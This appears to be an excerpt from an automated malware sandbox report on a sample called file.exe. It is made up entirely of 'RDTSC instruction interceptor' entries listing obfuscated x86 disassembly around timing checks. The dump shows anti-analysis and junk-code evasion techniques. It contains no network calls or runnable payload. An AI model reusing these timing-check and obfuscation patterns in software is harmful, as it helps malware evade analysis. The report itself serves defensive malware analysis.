                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E983F0 second address: E983F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E983F4 second address: E983F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98462 second address: E9846C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5408F9688Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9A6DA second address: E9A6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5408C21106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9A6E4 second address: E9A6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9A6F2 second address: E9A6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9865F second address: E9866D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9653F second address: E96557 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5408C21110h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9D73F second address: E9D74F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F5408F9688Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9D74F second address: E9D76B instructions: 0x00000000 rdtsc 0x00000002 js 00007F5408C2110Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F5408C2110Ah 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9D76B second address: E9D771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9DCC8 second address: E9DCE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9DCE3 second address: E9DD67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bl, 00h 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F5408F96888h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2BAFh], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F5408F96888h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 sub dword ptr [ebp+122D17EAh], edx 0x0000004e jmp 00007F5408F96899h 0x00000053 mov bh, 3Fh 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9DD67 second address: E9DD6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9DD6B second address: E9DD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnl 00007F5408F96886h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5408F96894h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9EE94 second address: E9EF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnl 00007F5408C2110Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push esi 0x0000000e jmp 00007F5408C2110Fh 0x00000013 pop esi 0x00000014 nop 0x00000015 cmc 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov ecx, eax 0x0000001b sub ebx, 3287B071h 0x00000021 popad 0x00000022 push 00000000h 0x00000024 sub dword ptr [ebp+122D17E2h], edx 0x0000002a jmp 00007F5408C2110Ch 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 push eax 0x00000032 jmp 00007F5408C21119h 0x00000037 pop eax 0x00000038 pushad 0x00000039 jmp 00007F5408C2110Dh 0x0000003e push edi 0x0000003f pop edi 0x00000040 popad 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9DEBC second address: E9DEC6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5408F9688Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA69B2 second address: EA69BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 je 00007F5408C21106h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA616A second address: EA6178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jg 00007F5408F96888h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAD107 second address: EAD10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAD10B second address: EAD127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96898h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAD283 second address: EAD2A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F5408C21106h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAD34F second address: EAD355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAD355 second address: EAD359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAD359 second address: CD1748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 7142393Eh 0x0000000f pushad 0x00000010 sbb edx, 1CDA0288h 0x00000016 jg 00007F5408F96889h 0x0000001c popad 0x0000001d push dword ptr [ebp+122D128Dh] 0x00000023 pushad 0x00000024 jmp 00007F5408F96893h 0x00000029 popad 0x0000002a call dword ptr [ebp+122D1BA5h] 0x00000030 pushad 0x00000031 jmp 00007F5408F96893h 0x00000036 xor eax, eax 0x00000038 jg 00007F5408F96892h 0x0000003e jg 00007F5408F9688Ch 0x00000044 sub dword ptr [ebp+122D1DCCh], edi 0x0000004a mov edx, dword ptr [esp+28h] 0x0000004e cld 0x0000004f mov dword ptr [ebp+122D3438h], eax 0x00000055 cmc 0x00000056 mov esi, 0000003Ch 0x0000005b cld 0x0000005c jmp 00007F5408F96896h 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 or dword ptr [ebp+122D1DCCh], edi 0x0000006b lodsw 0x0000006d mov dword ptr [ebp+122D1AC8h], ecx 0x00000073 jo 00007F5408F96887h 0x00000079 stc 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e sub dword ptr [ebp+122D1AC8h], esi 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 jnc 00007F5408F96892h 0x0000008e jno 00007F5408F9688Ch 0x00000094 nop 0x00000095 push eax 0x00000096 push eax 0x00000097 push edx 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1FC4 second address: EB1FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5408C2110Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1FD4 second address: EB1FDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1619 second address: EB163A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21116h 0x00000007 push ebx 0x00000008 jne 00007F5408C21106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB163A second address: EB1655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5408F96892h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1655 second address: EB1672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5408C21119h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB1795 second address: EB17C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jng 00007F5408F96892h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5408F96894h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB17C7 second address: EB17CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB17CB second address: EB17D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB17D1 second address: EB17DD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5408C2110Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88977 second address: E8897B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8897B second address: E8897F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8897F second address: CD1748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push esi 0x00000009 jnl 00007F5408F9688Ch 0x0000000f pop esi 0x00000010 nop 0x00000011 sub dword ptr [ebp+122D18A6h], eax 0x00000017 push dword ptr [ebp+122D128Dh] 0x0000001d jmp 00007F5408F96894h 0x00000022 call dword ptr [ebp+122D1BA5h] 0x00000028 pushad 0x00000029 jmp 00007F5408F96893h 0x0000002e xor eax, eax 0x00000030 jg 00007F5408F96892h 0x00000036 jg 00007F5408F9688Ch 0x0000003c sub dword ptr [ebp+122D1DCCh], edi 0x00000042 mov edx, dword ptr [esp+28h] 0x00000046 cld 0x00000047 mov dword ptr [ebp+122D3438h], eax 0x0000004d cmc 0x0000004e mov esi, 0000003Ch 0x00000053 cld 0x00000054 jmp 00007F5408F96896h 0x00000059 add esi, dword ptr [esp+24h] 0x0000005d or dword ptr [ebp+122D1DCCh], edi 0x00000063 lodsw 0x00000065 mov dword ptr [ebp+122D1AC8h], ecx 0x0000006b jo 00007F5408F96887h 0x00000071 stc 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 sub dword ptr [ebp+122D1AC8h], esi 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 jnc 00007F5408F96892h 0x00000086 nop 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88A6C second address: E88A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88AD9 second address: E88ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88ADD second address: E88AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88AE1 second address: E88AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88BAD second address: E88BB7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5408C2110Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88BB7 second address: E88BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xchg eax, esi 0x00000007 nop 0x00000008 jne 00007F5408F96892h 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88BD7 second address: E88BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88BDB second address: E88BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88C97 second address: E88CA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88CA1 second address: E88CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88CA5 second address: E88CCA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5408C21106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5408C21117h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88CCA second address: E88CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88CCF second address: E88D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C21116h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push esi 0x00000011 push edi 0x00000012 jmp 00007F5408C2110Bh 0x00000017 pop edi 0x00000018 pop esi 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 jg 00007F5408C21106h 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E88F10 second address: E88F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F5408F96899h 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F5408F96896h 0x00000013 nop 0x00000014 jno 00007F5408F9688Ch 0x0000001a push 00000004h 0x0000001c mov edi, dword ptr [ebp+122D1B69h] 0x00000022 push eax 0x00000023 jbe 00007F5408F96890h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89308 second address: E89357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F5408C21108h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call 00007F5408C2110Fh 0x0000002b pop ecx 0x0000002c push 0000001Eh 0x0000002e mov dword ptr [ebp+122D2A3Fh], ecx 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 jl 00007F5408C21108h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89457 second address: E8945B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8945B second address: E89461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89461 second address: E89475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007F5408F96886h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89475 second address: E89479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E688BF second address: E688D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E403E4 second address: E403EE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5408C21106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE6A5 second address: EBE6E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F5408F96898h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edi 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5408F96897h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBE6E3 second address: EBE6E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBEC0B second address: EBEC26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96894h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF004 second address: EBF013 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007F5408C21106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF013 second address: EBF022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 jc 00007F5408F9688Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF022 second address: EBF03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5408C21115h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF4AE second address: EBF4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EBF4B9 second address: EBF4D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Dh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F5408C2110Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC505F second address: EC507D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F96899h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC507D second address: EC50A9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5408C2111Dh 0x00000008 push edx 0x00000009 jmp 00007F5408C2110Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC3CFA second address: EC3D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC3FA2 second address: EC3FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC4285 second address: EC428A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC43C6 second address: EC43CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC43CB second address: EC43D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC4532 second address: EC4542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 push edx 0x00000008 ja 00007F5408C21106h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC47C4 second address: EC47C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC47C8 second address: EC47CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC47CE second address: EC47F9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5408F9688Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jno 00007F5408F96892h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F5408F96886h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC47F9 second address: EC4803 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C21106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC4963 second address: EC4985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5408F9688Bh 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC4985 second address: EC49A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F5408C21106h 0x0000000e jp 00007F5408C21106h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 jl 00007F5408C21112h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC49A4 second address: EC49AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC4F10 second address: EC4F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC38A7 second address: EC38B8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5408F9688Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
